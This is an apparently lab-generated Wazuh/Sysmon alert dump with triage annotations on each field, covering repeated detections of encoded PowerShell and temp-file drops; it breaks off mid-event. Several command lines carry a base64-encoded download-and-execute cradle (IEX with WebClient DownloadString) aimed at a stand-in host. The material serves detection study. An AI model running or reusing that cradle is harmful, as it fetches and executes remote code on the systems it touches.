data.win.eventdata.processGuid: {94294ddc-c18f-680a-f40c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8928 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_cew1hm2c.hha.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:56:18.689 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 127 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535385.2816708 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:22.6536408Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350737 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:56:19.920
ProcessGuid: {94294ddc-c193-680a-f60c-000000000e00}
ProcessId: 1672
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c18f-680a-f40c-000000000e00}
ParentProcessId: 8928
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:19.920 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c193-680a-f60c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 1672 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c18f-680a-f40c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 8928 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 131 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535385.2824771 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:22.8755727Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350738 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:56:22.872
ProcessGuid: {94294ddc-c193-680a-f60c-000000000e00}
ProcessId: 1672
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_b1g5bu1u.tbb.ps1
CreationUtcTime: 2025-04-24 22:56:22.872
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:22.872 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c193-680a-f60c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 1672 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_b1g5bu1u.tbb.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:56:22.872 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 128 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535387.2827536 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:25.7711247Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350777 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:56:24.033
ProcessGuid: {94294ddc-c198-680a-f80c-000000000e00}
ProcessId: 14476
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-c193-680a-f60c-000000000e00}
ParentProcessId: 1672
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:24.033 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c198-680a-f80c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14476 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-c193-680a-f60c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 1672 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 132 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535388.2835603 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:26.0786930Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350778 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:56:26.056
ProcessGuid: {94294ddc-c198-680a-f80c-000000000e00}
ProcessId: 14476
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_d23ja4vf.wy5.ps1
CreationUtcTime: 2025-04-24 22:56:26.056
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:56:26.056 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-c198-680a-f80c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 14476 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_d23ja4vf.wy5.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:56:26.056 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 129 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535391.2838372 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:56:28.7132822Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 350805 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:56:27.432
ProcessGuid: {94294ddc-c19b-680a-fa0c-000000000e00}
ProcessId: 13544
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
